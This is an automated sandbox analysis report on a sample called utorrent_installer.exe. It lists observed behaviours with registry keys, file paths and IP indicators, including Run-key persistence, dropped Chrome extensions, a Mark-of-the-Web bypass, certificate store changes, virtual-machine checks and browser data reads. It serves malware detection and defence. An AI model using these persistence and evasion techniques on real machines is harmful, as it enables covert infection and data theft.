Malware Analysis Report

2025-01-18 23:54

Sample ID 241115-eb56kaskep
Target utorrent_installer.exe
SHA256 401409e8da7321fb94a1a8ac6217d2dd067007d29547257575c26a39f31e8931
Tags
upx steam defense_evasion discovery evasion execution persistence phishing spyware stealer
score
8/10

Analysis Overview

Threat Level: Likely malicious

The file utorrent_installer.exe was found to be: Likely malicious.

Malicious Activity Summary

upx steam defense_evasion discovery evasion execution persistence phishing spyware stealer

Contacts a large (537) amount of remote hosts

Blocklisted process makes network request

Command and Scripting Interpreter: PowerShell

Unexpected DNS network traffic destination

Checks BIOS information in registry

Identifies Wine through registry keys

Indirect Command Execution

Adds Run key to start application

Network Share Discovery

Enumerates connected drives

Drops desktop.ini file(s)

Downloads MZ/PE file

Drops Chrome extension

Detected potential entity reuse from brand STEAM.

Drops file in System32 directory

UPX packed file

Checks computer location settings

Executes dropped EXE

Drops file in Program Files directory

Loads dropped DLL

Drops file in Windows directory

Checks installed software on the system

Subvert Trust Controls: Mark-of-the-Web Bypass

Unsigned PE

System Location Discovery: System Language Discovery

Reads user/profile data of web browsers

Enumerates physical storage devices

System Network Configuration Discovery: Internet Connection Discovery

Program crash

Browser Information Discovery

Suspicious use of AdjustPrivilegeToken

Suspicious use of FindShellTrayWindow

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Modifies data under HKEY_USERS

Enumerates system info in registry

NTFS ADS

Suspicious use of WriteProcessMemory

Checks processor information in registry

Suspicious use of SetWindowsHookEx

Modifies Internet Explorer settings

Suspicious behavior: EnumeratesProcesses

Checks SCSI registry key(s)

Modifies system certificate store

Suspicious use of SendNotifyMessage

Scheduled Task/Job: Scheduled Task

Runs net.exe

Suspicious behavior: GetForegroundWindowSpam

Modifies Control Panel

Modifies registry class

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-15 03:47

Signatures

UPX packed file

upx

Unsigned PE


Analysis: behavioral1

Detonation Overview

Submitted

2024-11-15 03:46

Reported

2024-11-15 04:04

Platform

win11-20241007-en

Max time kernel

1050s

Max time network

1051s

Command Line

"C:\Users\Admin\AppData\Local\Temp\utorrent_installer.exe"

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Contacts a large (537) amount of remote hosts

discovery

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\oKIyrUJE\ZG2ecJn9.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Windows\SysWOW64\rundll32.exe N/A

Identifies Wine through registry keys

evasion
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Wine C:\Users\Admin\AppData\Roaming\uTorrent\uTorrent.exe N/A
Key opened \REGISTRY\MACHINE\Software\WOW6432Node\Wine C:\Users\Admin\AppData\Roaming\uTorrent\uTorrent.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Wine C:\Users\Admin\AppData\Roaming\uTorrent\uTorrent.exe N/A
Key opened \REGISTRY\MACHINE\Software\WOW6432Node\Wine C:\Users\Admin\AppData\Local\Temp\nsr707E.tmp\utorrent.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\nsr707E.tmp\utorrent.exe N/A
Key opened \REGISTRY\MACHINE\Software\WOW6432Node\Wine C:\Users\Admin\AppData\Roaming\uTorrent\uTorrent.exe N/A

Indirect Command Execution

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\forfiles.exe N/A
N/A N/A C:\Windows\SysWOW64\forfiles.exe N/A

Unexpected DNS network traffic destination

Description Indicator Process Target
Destination IP 208.67.222.222 N/A N/A
Destination IP 152.89.198.214 N/A N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Microsoft\Windows\CurrentVersion\Run\ut = "C:\\Users\\Admin\\AppData\\Roaming\\uTorrent\\uTorrent.exe /MINIMIZED" C:\Users\Admin\AppData\Local\Temp\nsr707E.tmp\utorrent.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Microsoft\Windows\CurrentVersion\Run\Snetchball = "C:\\Users\\Admin\\AppData\\Roaming\\Snetchball\\Snetchball.exe" C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Microsoft\Windows\CurrentVersion\Run\Steam = "\"C:\\Program Files (x86)\\Steam\\steam.exe\" -silent" C:\Users\Admin\Downloads\SteamSetup.exe N/A

Downloads MZ/PE file

Drops Chrome extension

Description Indicator Process Target
File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\hipilpceecbhfpflneijogboalilnfjp\1.3.3_0\manifest.json C:\Windows\Temp\rLJCaCpfIrfYjdgZ\RcEfqUwXlczHRfM\OhJJMVd.exe N/A
File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json C:\Windows\Temp\rLJCaCpfIrfYjdgZ\RcEfqUwXlczHRfM\OhJJMVd.exe N/A

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini C:\Windows\Temp\rLJCaCpfIrfYjdgZ\RcEfqUwXlczHRfM\OhJJMVd.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\D: C:\Users\Admin\AppData\Local\Temp\7zS4462859E\setup.exe N/A
File opened (read-only) \??\F: C:\Users\Admin\AppData\Local\Temp\7zS4462859E\setup.exe N/A
File opened (read-only) \??\F: C:\Users\Admin\AppData\Local\Temp\is-ON11E.tmp\setup.tmp N/A
File opened (read-only) \??\D: C:\Users\Admin\AppData\Local\Temp\7zS4462859E\setup.exe N/A
File opened (read-only) \??\F: C:\Users\Admin\AppData\Local\Temp\7zS4462859E\setup.exe N/A

Network Share Discovery

discovery

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Control Panel\International\Geo\Nation C:\Windows\Temp\rLJCaCpfIrfYjdgZ\RcEfqUwXlczHRfM\OhJJMVd.exe N/A

Detected potential entity reuse from brand STEAM.

phishing steam

Drops file in System32 directory


UPX packed file

upx

Checks installed software on the system

discovery

Drops file in Program Files directory


Drops file in Windows directory


Executes dropped EXE


Loads dropped DLL


Subvert Trust Controls: Mark-of-the-Web Bypass

defense_evasion
Description Indicator Process Target
File opened for modification C:\Users\Admin\Downloads\SteamSetup.exe:Zone.Identifier C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\BOM Mix Pro 2.0.5.4\bommixpro.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\oKIyrUJE\ZG2ecJn9.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\Temp\rLJCaCpfIrfYjdgZ\RcEfqUwXlczHRfM\OhJJMVd.exe

Reads user/profile data of web browsers

spyware stealer

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\BOM Mix Pro 2.0.5.4\bommixpro.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Steam\steam.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-ON11E.tmp\setup.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-NRQ9F.tmp\utorrent.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-5SD8N.tmp\utorrent9.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language \??\E:\setup.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Steam\bin\steamservice.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS4462859E\setup.exe N/A

System Network Configuration Discovery: Internet Connection Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000003\HardwareID C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000003\Service C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_MSFT&PROD_VIRTUAL_DVD-ROM\2&1F4ADFFE&0&000003 C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName C:\Users\Admin\AppData\Roaming\uTorrent\uTorrent.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 C:\Users\Admin\AppData\Roaming\uTorrent\uTorrent.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000003\ConfigFlags C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_MSFT&PROD_VIRTUAL_DVD-ROM\2&1F4ADFFE&0&000003 C:\Users\Admin\AppData\Roaming\uTorrent\uTorrent.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000003\FriendlyName C:\Users\Admin\AppData\Roaming\uTorrent\uTorrent.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_MSFT&PROD_VIRTUAL_DVD-ROM\2&1F4ADFFE&0&000003 C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName C:\Users\Admin\AppData\Roaming\uTorrent\uTorrent.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 C:\Users\Admin\AppData\Roaming\uTorrent\uTorrent.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files (x86)\Steam\steam.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files (x86)\Steam\steam.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Users\Admin\AppData\Local\Temp\oKIyrUJE\ZG2ecJn9.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Windows\SysWOW64\rundll32.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Users\Admin\AppData\Local\Temp\oKIyrUJE\ZG2ecJn9.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Windows\SysWOW64\rundll32.exe N/A

Modifies Control Panel

evasion
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Control Panel\Cursors\AppStarting = "C:\\Windows\\\\Cursors\\\\aero_arrow.cur" C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION C:\Users\Admin\AppData\Roaming\uTorrent\uTorrent.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\utorrentie.exe = "11000" C:\Users\Admin\AppData\Roaming\uTorrent\uTorrent.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_SCRIPTURL_MITIGATION C:\Users\Admin\AppData\Roaming\uTorrent\uTorrent.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_SCRIPTURL_MITIGATION\utorrentie.exe = "1" C:\Users\Admin\AppData\Roaming\uTorrent\uTorrent.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_CROSS_DOMAIN_REDIRECT_MITIGATION C:\Users\Admin\AppData\Roaming\uTorrent\uTorrent.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_CROSS_DOMAIN_REDIRECT_MITIGATION\utorrentie.exe = "0" C:\Users\Admin\AppData\Roaming\uTorrent\uTorrent.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\Temp\rLJCaCpfIrfYjdgZ\RcEfqUwXlczHRfM\OhJJMVd.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix C:\Windows\Temp\rLJCaCpfIrfYjdgZ\RcEfqUwXlczHRfM\OhJJMVd.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\Temp\rLJCaCpfIrfYjdgZ\RcEfqUwXlczHRfM\OhJJMVd.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" C:\Windows\Temp\rLJCaCpfIrfYjdgZ\RcEfqUwXlczHRfM\OhJJMVd.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" C:\Windows\Temp\rLJCaCpfIrfYjdgZ\RcEfqUwXlczHRfM\OhJJMVd.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\Temp\rLJCaCpfIrfYjdgZ\RcEfqUwXlczHRfM\OhJJMVd.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{fc95478e-0000-0000-0000-d01200000000} C:\Windows\Temp\rLJCaCpfIrfYjdgZ\RcEfqUwXlczHRfM\OhJJMVd.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket C:\Windows\Temp\rLJCaCpfIrfYjdgZ\RcEfqUwXlczHRfM\OhJJMVd.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume C:\Windows\Temp\rLJCaCpfIrfYjdgZ\RcEfqUwXlczHRfM\OhJJMVd.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\TelemetrySalt = "6" C:\Users\Admin\AppData\Local\Temp\oKIyrUJE\ZG2ecJn9.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{fc95478e-0000-0000-0000-d01200000000}\MaxCapacity = "14116" C:\Windows\Temp\rLJCaCpfIrfYjdgZ\RcEfqUwXlczHRfM\OhJJMVd.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\steam\Shell\Open C:\Program Files (x86)\Steam\bin\steamservice.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Magnet\ = "Magnet URI" C:\Users\Admin\AppData\Local\Temp\nsr707E.tmp\utorrent.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\.torrent C:\Users\Admin\AppData\Local\Temp\is-NRQ9F.tmp\utorrent.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\steam\Shell C:\Program Files (x86)\Steam\bin\steamservice.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\application/x-bittorrent\Extension = ".torrent" C:\Users\Admin\AppData\Local\Temp\nsr707E.tmp\utorrent.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\MIME\Database\Content Type\application/x-bittorrent-key\Extension = ".btkey" C:\Users\Admin\AppData\Local\Temp\nsr707E.tmp\utorrent.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\steamlink\Shell C:\Program Files (x86)\Steam\bin\steamservice.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\application/x-bittorrent C:\Users\Admin\AppData\Local\Temp\nsr707E.tmp\utorrent.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Applications\uTorrent.exe\shell C:\Users\Admin\AppData\Local\Temp\nsr707E.tmp\utorrent.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.torrent\ = "Torrent" C:\Users\Admin\AppData\Local\Temp\is-NRQ9F.tmp\utorrent.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\steam\DefaultIcon\ = "steam.exe" C:\Program Files (x86)\Steam\bin\steamservice.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\.torrent\Content Type = "application/x-bittorrent" C:\Users\Admin\AppData\Local\Temp\nsr707E.tmp\utorrent.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\bittorrent\DefaultIcon C:\Users\Admin\AppData\Local\Temp\nsr707E.tmp\utorrent.exe N/A
